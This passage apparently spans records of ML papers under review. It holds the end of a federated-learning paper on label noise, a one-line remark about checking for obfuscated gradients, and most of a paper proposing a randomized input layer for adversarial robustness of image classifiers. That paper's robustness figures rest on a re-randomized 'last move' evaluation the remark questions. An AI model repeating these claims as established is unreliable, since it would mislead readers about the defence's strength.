42.30±1.66 | 19.76±1.66 | 63.03±0.62 | 43.06±2.42 | 11.11±2.83 | 10.22±2.98 | | | FedBN | 67.82±0.91 | 53.49±0.85 | 39.33±2.52 | 19.50±0.99 | 66.66±4.69 | 58.20±1.58 | 41.38±1.89 | 22.66±2.03 | | | Scaffold | 64.02±0.13 | 55.50±0.96 | 37.48±2.16 | 15.10±0.43 | 59.13±0.83 | 50.36±1.54 | 34.73±4.12 | 18.23±1.66 | | | FedDPCont | 44.77±0.12 | 75.75±1.96 | 55.50±1.35 | 24.64±0.55 | 82.15±0.24 | 72.69±1.57 | 59.06±1.38 | 27.55±1.49 | | CIFAR-100 | FedAvg | 47.78±0.50 | 32.63±0.27 | 20.32±0.51 | 10.62±0.26 | 47.75±0.29 | 31.06±0.79 | 20.14±0.32 | 9.71±0.43 | | | LC | 47.91±0.28 | 32.68±0.28 | 20.32±0.51 | 10.62±0.26 | 47.75±0.29 | 31.06±0.79 | 20.14±0.32 | 9.71±0.43 | | | FedProx | 42.14±0.27 | 24.68±0.11 | 16.52±0.77 | 8.85±0.60 | 40.77±0.30 | 25.03±0.47 | 17.16±0.64 | 8.84±0.56 | | | Co-teaching | 41.15±0.28 | 29.81±0.72 | 18.01±0.28 | 8.73±1.08 | 40.55±1.79 | 28.51±1.41 | 18.47±1.95 | 6.56±1.38 | | | T-revision | 48.21±0.56 | 31.35±0.46 | 17.41±0.22 | 7.79±0.28 | 48.24±0.47 | 30.91±0.55 | 16.95±0.78 | 7.46±0.20 | | | FedDyn | 31.73±0.79 | 23.35±0.23 | 15.53±0.22 | 7.82±0.35 | 32.22±0.35 | 23.83±0.42 | 16.23±0.59 | 7.86±0.10 | | | FedBN | 31.56±0.19 | 24.85±0.18 | 14.42±0.93 | 7.10±0.32 | 30.56±0.36 | 22.52±0.47 | 15.07±0.77 | 7.10±0.36 | | | Scaffold | 31.56±0.20 | 24.85±0.38 | 14.42±0.93 | 7.10±0.35 | 28.49±0.75 | 21.74±0.48 | 11.19±1.23 | 1.97±0.44 | | | FedDPCont | 53.39±0.43 | 34.99±1.66 | 21.35±0.69 | 11.02±0.66 | 51.73±0.36 | 34.43±0.72 | 21.35±0.72 | 10.64±0.43 | methods. We are aware that there are other noisy learning methods that achieve impressive performance, e.g., DivideMix (Li et al., 2020a). However, their underlying semi-supervised learning mechanisms and mix-up data augmentation (Zhang et al., 2018) methods introduce massive training cost and are out of the scope of this paper. We leave discussions related to the computation cost and performance comparisons with such method to Appendix D.1. The local updating iteration $E$ is 5 and the federated fraction $\lambda$ is 0.1. The architecture of the network is ResNet-18 (He et al., 2016) for CIFAR dataset and ResNet-50 (He et al., 2016) with ImageNet (Deng et al., 2009) pre-trained weight for Clothing-1M. The local learning rate $\alpha_l$ is 0.01 and the batch size is 32. The total communication round with the server $R$ is 300 and differential privacy $\epsilon$ are 3.58, 5.98 and 3.95 for CIFAR-10, CIFAR-100 and Clothing-1M, respectively to keep $\epsilon^c / (\epsilon^c + K - 1) < 0.2$ in Section 4.1. All the experiments are run for 3 times with different random seeds to validate the generality of our methods. The details of the implementation of every baseline method in the FL setting can be found in the Appendix. 5.2 Synthetic Open-Set Label Noise There are two strategies: - **Symmetric**: We first add symmetric label noise (Xia et al., 2019; Han et al., 2018) to dataset $D$ and get $\tilde{D}$, then distribute $\tilde{D}$ to $\tilde{D}_c$, $\forall c$ following the uniform allocation in Section 3.1. The transition matrix $T$ for the symmetric label noise satisfies $T_{ij} = \eta/(K - 1), \forall i \neq j$ and $T_{ii} = 1 - \eta, \forall i \in [K]$, where $\eta \in \{0.2, 0.4, 0.6, 0.8\}$ is the average noise rate. - **Random**: We first add random label noise (Zhu et al., 2022) to dataset $D$ and get $\tilde{D}$, then distribute $\tilde{D}$ to $\tilde{D}_c$, $\forall c$ following the non-uniform allocation in Section 3.1. The $T$ of random noise is generated as follows. The diagonal elements of $T$ for the random label noise is generated by $\eta + \text{Unif}(-0.05, 0.05)$, where $\eta$ is the average noise rate, $\text{Unif}(-0.05, 0.05)$ is the uniform distribution bounded by $-0.05$ and $0.05$. The off-diagonal elements in each row of $T$ follow the Dirichlet distribution $(1 - T_{ii}) \cdot \text{Dir}(1)$, where $1 = [1, \cdots, 1]$ ($K - 1$ values). The random strategy is more practical than the symmetric one. **Results and Discussion** Table 1 shows FedDPCont is significantly better than all the baseline methods in the symmetric strategy across almost all the noise rate settings. It is also better than the other methods in most settings of the random strategy and can always be the top-2. FedDPCont is very competitive in all the settings. Table 1 also shows directly applying the methods for centralized learning with noisy labels cannot be statistically better than the traditional federated learning solution (FedAvg) and its adapted version (FedProx), indicating the openset label noise in FL is indeed challenging and special treatments are necessary to generalize the centralized solution to the FL setting. We also report the accuracy of the last epoch in Table ?? and ?? in Appendix. FedDPCont also stands out in most cases, showing its stability. Table 2: The performance (the best accuracy) of all methods on CIFAR-N and Clothing-1M | Methods | CIFAR-10 | CIFAR-100 | Clothing-1M | |-------------|-------------------|-------------------|-------------| | | Worst | Random | Aggregate | Fine | 1M Noisy Training | | FedAvg | 46.55±7.82 | 59.69±4.88 | 66.41±6.52 | 22.65±2.29 | 70.27 | | LC | 46.67±8.21 | 59.27±5.72 | 67.27±4.76 | 22.59±1.66 | 70.05 | | FedProx | 58.47±0.97 | 69.35±0.62 | 74.48±1.00 | 35.33±0.35 | 65.96 | | Co-teaching | 24.80±2.27 | 47.34±21.05 | 62.04±11.26 | 17.83±0.39 | 40.33 | | T-revision | 57.85±19.44 | 55.06±8.40 | 63.40±9.99 | 22.18±1.44 | 66.95 | | FedBN | 63.07±3.29 | 73.02±1.45 | 77.55±2.16 | 37.59±0.61 | - | | FedDPCont | **63.50±5.63** | **73.68±4.35** | **81.86±1.09** | **40.60±1.91** | **70.88** | Table 3: The influence of different $\epsilon$ on the performance. | $\epsilon$ | $\epsilon = 1$ | $\epsilon = 2$ | $\epsilon = 4$ | $\epsilon = 8$ | $\epsilon = 100$ | $\epsilon = 3.58$ | |------------|----------------|----------------|----------------|----------------|------------------|------------------| | | 72.47±2.64 | 71.60±1.96 | 72.27±1.87 | 73.00±1.96 | 73.75±2.38 | 72.44±1.52 | 5.3 Real-World Label Noise We also test the performance on two real-world datasets: CIFAR-N (Wei et al., 2022b) and Clothing-1M (Xiao et al., 2015). Different from the benchmark datasets, these datasets are corrupted naturally. Clothing-1M is collected from the real website where both data and labels are from the real users. The noisy ratio is about 0.4 in Clothing-1M. CIFAR-N consists of CIFAR-10 and CIFAR-100. $D_c$ is generated according to the random setting given in Section 5.2. The labels of CIFAR-N are collected from the human annotation. There are three levels of noisy ratio in CIFAR-10, worst, aggregate and random while there is only one noisy level in CIFAR-100. It can be found that FedDPCont outperforms all the baseline methods in the real-world dataset, showing great potential in practical usage. 5.4 Effect of DP Level According to Section 4.1 and 4.2, label communication and peer gradient updates at local clients are two key steps in FedDPCont. $\epsilon$ is the parameter to control the level of DP protection. Following Ghazi et al. (2021), we study the influence of $\epsilon$ on the performance. We select the CIFAR-10 corrupted by random noise whose ratio is 0.4. All the experiments are run with 10 random seeds. In terms of the randomness of model initialization and the noise generation, it can be found that FedDPCont is stable with the change of $\epsilon$, which agrees with our theoretical guarantee. 6 Conclusion We have defined openset label noise in FL and proposed FedDPCont to use globally communicated contrastive labels to prevent local models from memorizing openset noise patterns. We have proved that FedDPCont is able to approximate a centralized solution with strong theoretical guarantees. Our experiments also verified the advantage of FedDPCont. Admittedly, FedDPCont is only tested with different label noise regimes with synthetic data partitions. Future works include testing FedDPCont with real-world FL data partitions and real-world clients such as mobile devices. REFERENCES Durmus Alp Emre Acar, Yue Zhao, Ramon Matas Navarro, Matthew Mattina, Paul N Whatmough, and Venkatesh Saligrama. Federated learning based on dynamic regularization. *arXiv preprint arXiv:2111.04263*, 2021. Vibhu Agarwal, Tanya Podchiyska, Juan M Banda, Veena Goel, Tiffany I Leung, Evan P Minty, Timothy E Sweeney, Elsie Gyang, and Nigam H Shah. Learning statistical models of phenotypes using noisy labeled training data. *Journal of the American Medical Informatics Association*, 23(6):1166–1173, 2016. Mathieu Andreux, Jean Ogier du Terrail, Constance Beguier, and Eric W Tramel. Siloed federated learning for multi-centric histopathology datasets. In *Domain Adaptation and Representation Transfer, and Distributed and Collaborative Learning*, pp. 129–139. Springer, 2020. Yoshinori Aono, Takuya Hayashi, Lihua Wang, Shiho Moriai, et al. Privacy-preserving deep learning via additively homomorphic encryption. *IEEE Transactions on Information Forensics and Security*, 13(5):1333–1345, 2017. HeeSun Bae, Seungjae Shin, Byeonghu Na, JoonHo Jang, Kyungwoo Song, and Il-Chul Moon. From noisy prediction to true label: Noisy prediction calibration via generative model. In *International Conference on Machine Learning*, pp. 1277–1297. PMLR, 2022. Hao Cheng, Zhaowei Zhu, Xingyu Li, Yifei Gong, Xing Sun, and Yang Liu. Learning with instance-dependent label noise: A sample sieve approach. *arXiv preprint arXiv:2010.02347*, 2020. Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In *2009 IEEE conference on computer vision and pattern recognition*, pp. 248–255. Ieee, 2009. Lei Feng, Senlin Shu, Zhuoyi Lin, Fengmao Lv, Li Li, and Bo An. Can cross entropy loss be robust to label noise? In *Proceedings of the Twenty-Ninth International Conference on International Joint Conferences on Artificial Intelligence*, pp. 2206–2212, 2021. Jonas Geiping, Hartmut Bauermeister, Hannah Dröge, and Michael Moeller. Inverting gradients—how easy is it to break privacy in federated learning? *Advances in Neural Information Processing Systems*, 33:16937–16947, 2020. Badih Ghazi, Noah Golowich, Ravi Kumar, Pasin Manurangsi, and Chiyuan Zhang. Deep learning with label differential privacy. *Advances in Neural Information Processing Systems*, 34:27131–27145, 2021. Aritra Ghosh, Himanshu Kumar, and P Shanti Sastry. Robust loss functions under label noise for deep neural networks. In *Proceedings of the AAAI conference on artificial intelligence*, volume 31, 2017. Bo Han, Quanming Yao, Xingrui Yu, Gang Niu, Miao Xu, Weihua Hu, Ivor Tsang, and Masashi Sugiyama. Co-teaching: Robust training of deep neural networks with extremely noisy labels. *Advances in neural information processing systems*, 31, 2018. Bo Han, Quanming Yao, Tongliang Liu, Gang Niu, Ivor W Tsang, James T Kwok, and Masashi Sugiyama. A survey of label-noise representation learning: Past, present and future. *arXiv preprint arXiv:2011.04406*, 2020. Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In *Proceedings of the IEEE conference on computer vision and pattern recognition*, pp. 770–778, 2016. Zhimeng Jiang, Kaixiong Zhou, Zirui Liu, Li Li, Rui Chen, Soo-Hyun Choi, and Xia Hu. An information fusion approach to learning with instance-dependent label noise. In *International Conference on Learning Representations*, 2022. URL https://openreview.net/forum?id=ecH2FKaARUp.
KncRpAnprQ
A simple test to verify the obfuscating gradient behaviour is to measure whether the perturbation, found based on the attack methods in the paper, indeed reaches the specified radius of the $\ell_p$ ball.
A NOVEL APPROACH FOR ADVERSARIAL ROBUSTNESS Anonymous authors Paper under double-blind review ABSTRACT Deep learning has made tremendous progress in the last decades; however, it is not robust to adversarial attacks. To deal with this issue, perhaps the most effective approach is adversarial training at a high computational cost, although it is impractical as it needs prior knowledge about the attackers. In this paper, we propose a novel approach that can train a robust network only through standard training with clean images without awareness of the attacker’s strategy. Essentially, we add a specially designed network input layer, which accomplishes a randomized feature squeezing to greatly reduce the malicious perturbation. It achieves the state of the art of robustness against unseen $l_1$, $l_2$, and $l_\infty$-attacks at one time in terms of the computational cost of the attacker versus the defender through just 100/50 epochs of standard training with clean images in CIFAR-10/ImageNet. 1 INTRODUCTION The vulnerability of neural networks has been widely acknowledged by the deep learning community since the seminal work of Szegedy et al. (2014). A lot of solutions have been proposed to solve these problems. They can be categorized into three classes. The first is preprocessing-based approaches which include bit-depth reduction (Xu et al., 2018), JPEG compression, total variance minimization, image quilting (Guo et al., 2018), and Defense-GAN (Samangouei et al., 2018). With this kind of preprocessing, the hope is that the adversarial effect can be reduced. However, it neglects the fact that the adversary can still take this operation into account and craft an effective attack through Backward Pass Differentiable Approximation (BPDA) (Athalye et al., 2018). Secondly, perhaps the most effective method is adversarial training. The idea is straightforward. In the training phase, the attack is mimicked through the backward gradient propagation with respect to the current network state. There is a large volume of work that falls into this class which differs in how to generate extra training samples. Madry et al. (2018) used a classical 7-step PGD attack, while other approaches are also possible, such as Mixup inference (Pang et al., 2020), feature scattering (Zhang & Wang, 2019), feature denoising (Xie et al., 2019), geometry-aware instance reweighting (Zhang et al., 2021), and channel-wise activation suppressing (Bai et al., 2021). External (Gowal et al., 2020) or generated data (Gowal et al., 2021; Rebuffi et al., 2021) are also beneficial for robustness, and based on which parameterizing activation functions (Dai et al., 2022) can do further improvement. Theoretically principled trade-off between robustness and accuracy is analyzed in Zhang et al. (2019), which is somehow reconciled by a self-consistent robust error (Pang et al., 2022) or reducing excess margin along certain adversarial directions (Rade & Moosavi-Dezfooli, 2022). Pre-training is also helpful in Hendrycks et al. (2019). Recently, Jin et al. (2022) proposed to enhance adversarial training with second-order statistics of weights. The inherent drawback is the large computation cost, therefor practical significance is somehow diminished. It should be noted here that there do exist some free or fast adversarial training schemes as in Shafahi et al. (2019); Wong et al. (2020) or an improved subspace variant (Li et al., 2022), but there is some degradation in performance. Another big issue is that the adversarial training needs to know some prior knowledge about attacks, otherwise a simulation of attack can not be conducted. This is certainly not realistic in practice. Usually, they only do training with just one particular $l_p$-attack, with the exception that Laidlaw et al. (2021) uses Perceptual Adversarial Training against multiple attacks. Also, there is a possibility of robust overfitting (Rice et al., 2020). The last is adaptive test-time defenses. They try to purify the input in an iterative way as in Mao et al. (2021); Shi et al. (2021); Yoon et al. (2021) or adapt the model parameters or even network structures to reverse the attack effect. For example, close-loop control is adopted in Chen et al. (2021), and a neural Ordinary Differential Equation (ODE) layer is applied in Kang et al. (2021). Unfortunately, most of them are proven to be not effective in Croce et al. (2022). It turns out the progress is not optimistic, and even 1%-2% improvement on AutoAttack (Croce & Hein, 2020) requires huge computational cost and moreover, not effective for unseen attacks. Here we ask a question: “can we design a novel network and loss function thereof that can drive the network to be robust on its own without awareness of adversarial attacks?” In other words, we do not intend to generate extra adversarial samples like most other approaches do, and standard training with clean images is enough. Indeed, there should be no prior knowledge of attacks needed at all. This certainly poses a great challenge to the construction of networks as it is not clear even whether it is feasible. On the other hand, it appears to be possible since deep networks have a very high capacity. Unfortunately, Ilyas et al. (2019) pointed out network tends to learn discriminant features that can help correct classification, regardless of robustness. It motivates us to take the point of view from the network input side. How can we make a new input layer that is most suitable for network robustness? Our intuition is essentially very simple. As attacks can always walk across the class decision boundary through the malicious feature perturbations, it appears that feature squeezing might be helpful, at least reducing the space of being altered. However, fundamentally different from the work (Xu et al., 2018), we squeeze the input features in a random and controlled way with parameters learned during training as shown in Figure 1, which will be elaborated in the latter sections. The experiments of CIFAR-10 and ImageNet demonstrate this approach is very useful in promoting robustness of networks. In summary, we present an efficient approach that achieves the state of the art of robust accuracy when attack computations are constrained, especially for black-box and $l_1, l_2$-attacks, only through standard training with clean images, without any prior knowledge about the attacks. 2 RELATED WORKS There are some works that add some extra preprocessing steps. For example, in Yang et al. (2019), pixels are randomly dropped and then reconstructed using matrix estimation. Ours is not preprocessing. We just add an extra layer inside the network, and the network is trained and tested as usual without explicit image completion. Besides this, to get high robust accuracy, Yang et al. (2019) needs adversarial training while we adopt standard training with clean images. Another related work is certified adversarial robustness via randomized smoothing (Cohen et al., 2019). The base classifier is trained with Gaussian data augmentation, and inference is based on the most likely class of the input perturbed by isotropic Gaussian noise. Ours is based on standard training and test, and there is no perturbation-based training data augmentation involved at all. Recently, there are some works that address the robustness from the network architecture’s perspective. Wu et al. (2021) investigates impact of the network width on the model robustness, and proposes Width Adjusted Regularization. Similarly, Huang et al. (2021) explores architectural ingredients of adversarially robust deep neural networks in a thorough manner. Liu et al. (2023a) established that the higher weight sparsity is beneficial for adversarially robust generalization via Rademacher complexity. Wang et al. (2022) proposes batch normalization removal, such that adversarial training can be improved. Singla et al. (2021) shows that using activation functions with low curvature values reduces both the standard and robust generalization gaps in adversarial training. It is in some sense similar to ours, but our motivations are fundamentally different. There is no adversarial training involved in our approach at all. Robust Vision Transformer has been advocated in Mao et al. (2022). Under the setting of standard training, it is better than previous Vision Transformers and CNNs, however, unfortunately, not comparable with the adversarial training methods, which are surpassed by ours. Regularization has also been widely adopted in adversarial training. Cui et al. (2021) uses model logits from one clean model to guide learning of another robust model. Spectral norm regularization based on Lyapunov theory has also been proposed in Rahnama et al. (2020) to improve the robust- ness against $l_2$ adversarial attack. Compared with these regularization methods, ours seeks for better network input layer design to make the network become robust on its own. 3 BACKGROUND A standard classification can be described as follows: $$\min_{\vartheta} E_{(x,y) \sim D} [L(x, y, \vartheta)],$$ where data examples $x \in \mathbb{R}^d$ and corresponding labels $y \in [k]$ are taken from the underlying distribution $D$, and $\vartheta \in \mathbb{R}^p$ is the model parameters to be optimized with respect to an appropriate function $L$, for instance cross-entropy loss. When $x \in \mathbb{R}^d$ can be maliciously manipulated within a set of allowed perturbations $S \subseteq \mathbb{R}^d$, which is usually chosen as a $l_p$-ball ($p \in \{1, 2, \infty\}$) of radius $\epsilon$ around $x$, Equation (1) should be modified as: $$\min_{\vartheta} E_{(x,y) \sim D} \left[ \max_{\delta \in S} L(x + \delta, y, \vartheta) \right].$$ An adversary implements the inner maximization via various white-box or black-box attack algorithms, for example, APGD$_{\infty}$ (Croce & Hein [2020]) or Square Attack (Andriushchenko et al. [2020]). The basic multi-step projected gradient descent (PGD) is $$x^{t+1} = \Pi_{x+S} \left( x^t + \alpha \text{sgn} (\nabla_x L(x, y, \vartheta)) \right),$$ where $\alpha$ denotes a step size and $\Pi$ is a projection operator. In essence, it uses the current gradient to update $x^t$, such that a better adversarial sample $x^{t+1}$ can be obtained. Some heuristics can be used to get better gradient estimation in Croce & Hein (2020). On the other hand, outer minimization is the goal of a defender. Adversarial training is the most effective approach to achieve this outer minimization via augmenting the training data with crafted samples. In fact, all current approaches, including test-time adaptive defense as it needs a base classifier, aim to learn the parameters of a pre-existing model to improve the robustness. In this paper, we try to increase the robustness through a specially designed input layer such that standard training with clean images can be adopted. 4 METHOD 4.1 INPUT LAYER As we stated earlier, the goal of input layer is to squeeze the input feature in a random and controlled way. The whole procedure is depicted in Figure 1. It consists of the following steps: 1. The input $x$ with $r, g, b$ channel will be normalized to a variable with a mean 0 and a standard deviation 1, through $\tilde{x} = \frac{x - \text{mean}}{\text{std}}$ in the input layer. 2. The normalized value $\tilde{x}$ goes through a $3 \times 3$ 2D convolution and ReLU, and we get $\hat{x}$ with three channels. 3. The final output $y$ is a Sigmoid of the element-wise three-term multiplication, $(\tilde{x} + \varepsilon) \times (\tilde{x} - \delta) \times \left( \frac{1}{\tilde{x} + \gamma} \right)$. Here $\varepsilon$ is a Gaussian random variable with a mean 0 and a standard deviation $\sigma$; $\delta$ is a uniform one on $[0, 1]$; and $\gamma$ is a small constant in order to make the denominator always positive, which is $1 \times 10^{-5}$ in this paper. So essentially, $$y = \frac{1}{1 + \exp \left( - \frac{(\tilde{x} + \varepsilon) \times (\tilde{x} - \delta)}{\tilde{x} + \gamma} \right)}. \quad (4)$$ Figure 1: Our specially designed input layer is inside the red rectangle. The input image $x$ is first normalized, then undergoes three paths. On one path, Gaussian noise $\epsilon$ is added, and the other two paths include $3 \times 3$ convolution and ReLU followed by subtraction of noise $\delta$ which has the uniform distribution on $[0, 1]$, and reciprocal respectively. Finally, all three terms are combined through multiplication and the result feeds to the Sigmoid. The final $Y$ will be used as inputs to the classification network, the same as other training approaches. End-to-end training scheme is adopted to learn the parameters of $3 \times 3$ convolution. This formula can be interpreted this way. $\tilde{x} + \epsilon$ is a polluted version of the input image, and $\frac{\hat{x} - \delta}{\hat{x} + \gamma}$ tries to modulate the image based on the $\hat{x}$, named as sampling matrix having the same size as input $x$. Due to the ReLU operation, $\hat{x}$ is always non-negative. Since $\delta$ has uniform distribution on $[0, 1]$, the numerator $(\tilde{x} + \epsilon) \times (\hat{x} - \delta)$ can be considered as a random fraction $\hat{x} - \delta$ of $\tilde{x} + \epsilon$, which will be allowed to feed to Sigmoid. The key motivation is that if we enforce $\hat{x}$ to be very small through some loss function, the whole $\frac{(\tilde{x} + \epsilon) \times (\hat{x} - \delta)}{\hat{x} + \gamma}$ will become big and the response of Sigmoid will be on the saturated region, i.e., most elements of $y$ will be either 0 or 1. In other words, the input feature will be squeezed in a random manner where the parameters of sampling matrix $\hat{x}$ are learned on the end-to-end training. 4.2 Loss Function As mentioned earlier, we have to design a loss function to implement our motivation to make the sampling matrix $\hat{x}$ small. For each $\hat{x}$, we get $S$, the average of all the elements of $\hat{x}$ that are greater than some threshold $\beta$. A small $\beta$ means $\hat{x}$ will become sparse. The final loss function is: $$L = \alpha \times L_{ce} + S,$$ where $L_{ce}$ is cross-entropy loss, and $\alpha$ is the weight. When $\alpha$ becomes large, the loss function falls back to standard cross-entropy. In summary, there are only three parameters, $\sigma$ of Gaussian noise, threshold $\beta$, and weight $\alpha$. 4.3 Last Move We emphasize here that since our approach is random, a same sample could be classified with different logits when executed multiple times. It will seriously mislead attackers, which will report a wrong robust accuracy. For that reason, we always take the last-move advantage. In other words, in test time, we always take the adversarial samples generated by attackers and feed them to our network once again to test. We think that is fair in practice. Attackers can always take an arbitrarily long time to figure out a malicious sample, but they have only one chance to submit it. It is the | Paper | Clean || AA-$l_\infty$ | AA-$l_1$ | AA-$l_2$ | Square-$l_\infty$ | Square-$l_1$, $l_2$ | |-----------------------|--------|-----------------|---------|---------|------------------|--------------------| | Wang et al. (2023)# | 92.44 | 67.31 | 25.46 | 10.23 | 1.18 | 73.57 | | Gowal et al. (2021)# | 87.50 | 63.38 | 27.91 | 10.85 | 1.94 | 68.90 | | Dai et al. (2022)# | 87.02 | 61.55 | 26.28 | 11.22 | 1.98 | 66.99 | | Wang et al. (2023)* | 95.16 | 49.33 | 3.86 | 46.08 | 6.59 | 67.02 | | Rebuffi et al. (2021)*| 91.79 | 47.83 | 5.04 | 42.80 | 8.23 | 62.45 | | Laidlaw et al. (2021) | 82.40 | 30.20 | 4.50 | 32.40 | 7.10 | 46.40 | | Ours | 81.88 | **80.43** | **77.01**| **78.34**| **63.10** | **80.87** | Table 1: AutoAttack comparison on CIFAR-10 (WideResNet-28-10 only except ResNet-50 in Laidlaw et al. (2021)). * denote models that are trained with $l_2-\epsilon=0.5$, while # with $l_\infty-\epsilon=8/255$; both * and # need extra training data. $l_\infty-\epsilon=8/255, 16/255$; $l_1-\epsilon=12$ and $l_2-\epsilon=2$. The bold indicates the best for each column. attacker’s responsibility to provide a stable adversarial sample, and the last move is always the defender’s privilege. 5 EXPERIMENTS To verify the effectiveness of our approach, we conducted the experiments on CIFAR-10 and ImageNet. Both the threshold $\beta$ and the weight $\alpha$ are set to be 0.1 uniformly in our study, while $\sigma$ of Gaussian noise is different for two datasets which will be addressed in the following, as this parameter essentially is related to clean accuracy which in turn depends on dataset and network architecture. We evaluate on AutoAttack and Square Attack of $l_\infty$, $l_1$ and $l_2$. AutoAttack is comprised of four attacks, namely Auto-PGD for cross-entropy and Difference of Logits Ratio (DLR) loss, FAB-attack (Croce & Hein) and the black-box Square Attack (Andriushchenko et al., 2020), and commonly used as a robustness evaluator. Square is used as a representative black-box attack separately as well, as it is of practical significance. 5.1 CIFAR-10 In this paper, we choose the wide residual network WideResNet-28-10 (Zagoruyko & Komodakis, 2016) as the base network, where we add our specially designed input layer as described in Section 4. $\sigma$ of Gaussian noise is 0.5. The initial learning rate of 0.1 is scheduled to drop at 30, 60, and 80 out of 100 epochs in total with a decay factor of 0.2. The weight decay factor is set to $5 \times 10^{-4}$, and the batch size is 200. To emphasize again, we only perform standard training through just 100 epochs. We compare our method with some state of the arts, which are all based on adversarial training. $l_\infty$, $l_1$ and $l_2$-AutoAttack (Croce & Hein, 2020) are adopted. Some results are shown in Table 1. All these models are trained with one particular type of attack either with $l_\infty-\epsilon = 8/255$ or $l_2-\epsilon = 0.5$, except Laidlaw et al. (2021) adopts neural perceptual threat model. Ours outperforms all other methods significantly against multiple unseen attacks including the practical black-box Square Attack, although we only use standard training with clean images. Indeed, robustness against multiple attack models should be vital for applications since we can’t assume the attack will follow the simulations conducted in the malicious sample generation in adversarial training methods. Unfortunately, most current works fail to generalize well to unseen attacks. Another significant advantage of ours is the computational cost shown in Table 2 where all other competitors in Table 2 are 3-5 orders of magnitude higher than ours. As our algorithm is random in nature, we also adopt the EOT-test as shown in Table 3. There are some drops in accuracy, however, it is still much better than others. Note that EOT incurs a large computational cost, so actually, it is unfair to compare the robustness of networks without computation constraints. | Paper | #Extra | #Epochs | #PGD | #Cost | |-----------------------|--------|---------|------|---------| | Wang et al. (2023)# | 20M | 2400 | 10 | $9.6 \times 10^4$ | | Goyal et al. (2021)# | 100M | 2000 | 10 | $4 \times 10^5$ | | Dai et al. (2022)# | 6M | 200 | 10 | $2.4 \times 10^3$ | | Wang et al. (2023)* | 50M | 1600 | 10 | $1.6 \times 10^5$ | | Rebuffi et al. (2021)*| 1M | 800 | 10 | $1.6 \times 10^3$ | | Ours | 0 | 100 | 0 | 1 | Table 2: Computational cost comparison. Excluding the cost of gathering extra data, the training cost in #Cost is roughly the product of #Epochs(training epochs), #Extra, and #PGD(pgd steps adopted in adversarial inputs generation) with respect to ours, i.e., 50K inputs and 100 epochs of standard training, which is denoted by 1. | Attacks | APGD\text{ce} | APGD\text{dir} | |------------------|---------------|----------------| | $l_\infty-\epsilon=8/255$ | 75.96 | 77.46 | | $l_\infty-\epsilon=16/255$ | 57.92 | 64.48 | | $l_1-\epsilon=12$ | 67.89 | 67.68 | | $l_2-\epsilon=2$ | 47.18 | 55.74 | Table 3: The EOT accuracy of APGD\text{ce} and APGD\text{dir} attacks for CIFAR-10. ### 5.2 IMAGENET ImageNet is the most challenging dataset for adversarial defense. In this paper, ImageNet only refers to ImageNet-1k without explicit clarification, and robustness is only evaluated on the 5000 images of the ImageNet validation set as in RobustBench (Croce et al., 2021). For simplicity, we choose the architecture of ConvNeXt-T + ConvStem in Singh et al. (2023). Our training scheme is very simple. All parameters are randomly initialized, followed by standard training for 50 epochs with heavy augmentations without CutMix (Yun et al., 2019) and MixUp (Zhang et al., 2018), as these will undermine the viability of our sampling matrix. While for the same ConvNeXt-T + ConvStem in Singh et al. (2023), although ConvStem is randomly initialized, the ConvNeXt-T part is from a strong pre-trained model which usually takes about 300 epochs. Thus the whole network needs extra standard training for 100 epochs to get good clean accuracy, followed by 300 epochs of adversarial training with 2-step APGD. So the total cost is up to $300 + 100 + 300 \times (2 \text{ (for APGD steps)} + 1 \text{ (for weights update)}) = 1300$, which is around $1300/50 = 26$ times bigger than ours. | Architecture | Clean || AA-$l_\infty$ | AA-$l_1$ | AA-$l_2$ | Square-$l_\infty$ | Square-$l_1$, $l_2$ | |-------------------------------|--------|-----------------|----------|----------|-------------------|---------------------| | ConvNeXt-T + ConvStem | Singh et al. (2023) | 72.74 || 49.46 24.10 | 24.50 | 48.40 | 63.42 52.44 | 49.40 68.06 | | Ours | 69.92 || 65.92 52.64 | **68.46** | **69.44** | 69.48 68.52 | **69.40** 69.28 | | Swin-L | Liu et al. (2023b)* | 78.92 || 59.56 32.72 | 26.88 | 52.02 | **70.38** 61.56 | 55.52 **74.18** | | ConvNeXt-L | Liu et al. (2023b)* | 78.02 || 58.48 32.00 | 26.18 | 52.22 | 70.12 61.04 | 54.40 72.86 | | ConvNeXt-T+ConvStem | Singh et al. (2023) | 77.00 || 57.70 31.86 | 22.38 | 47.02 | 69.66 59.48 | 54.18 72.80 | Table 4: AutoAttack comparison on ImageNet. $l_\infty-\epsilon=4/255$, 8/255; $l_1-\epsilon=75$ and $l_2-\epsilon=2$. The bold indicates the best for each column. * denote models that are pre-trained with ImageNet-21k. Figure 2: The two halves are arranged in a similar way. The first row shows the input valley and great-white-shark $x$, and the next two show the corresponding sampling matrix $\hat{x}$ and the final output $y$, with three channels aligned. It is very interesting to note that the continuous patterns are highly squeezed into two extreme values, 0 and 1, in $y$ due to very small $\hat{x}$. Nevertheless, the V shape pattern in valley can still be identified in $y$. Indeed, this image is classified correctly. Surprisingly, although the features of great-white-shark are buried due to our intentionally injected noise, it is classified correctly as well. | Attacks | APGD\textsubscript{ce} | APGD\textsubscript{dir} | |------------------|------------------------|-------------------------| | \(l_{\infty}-\epsilon=4/255\) | 45.80 | 52.50 | | \(l_{\infty}-\epsilon=8/255\) | 17.08 | 26.54 | | \(l_1-\epsilon=75\) | 67.58 | 68.50 | | \(l_2-\epsilon=2\) | 68.60 | 69.54 | Table 5: The EOT accuracy of APGD\textsubscript{ce} and APGD\textsubscript{dir} attacks for ImageNet. | Architecture | Clean || Square-\(l_{\infty}\) | Square-\(l_1, l_2\) | E-Square-\(l_{\infty}\) | E-Square-\(l_1, l_2\) | |------------------|--------|-----------------------------|----------------------|--------------------------|----------------------| | ConvNeXt-T + ConvStem | Singh et al. (2023) | 72.20 || 65.80 55.20 | 51.20 69.00 | 61.60 43.40 | 42.00 66.80 | | Ours | 71.40 || 70.00 \textbf{70.00} | \textbf{72.20} 71.80 | \textbf{69.60} \textbf{70.00} | \textbf{70.00} 70.00 | | Swin-L | Liu et al. (2023b)* | 79.80 || \textbf{70.60} 60.80 | 55.00 \textbf{74.40} | 66.40 52.00 | 46.80 \textbf{71.80} | Table 6: Square Attack comparison on 500 images on validation set of ImageNet instead of 5000 on Table 4. \(l_{\infty}-\epsilon=4/255, 8/255; l_1-\epsilon=75\) and \(l_2-\epsilon=2\). The bold indicates the best for each column. * denote models that are pre-trained with ImageNet-21k. The iterations are 5K for Square Attack, and 50K for E-Square (Enhanced-Square Attack). As shown in Table 4, ours beats 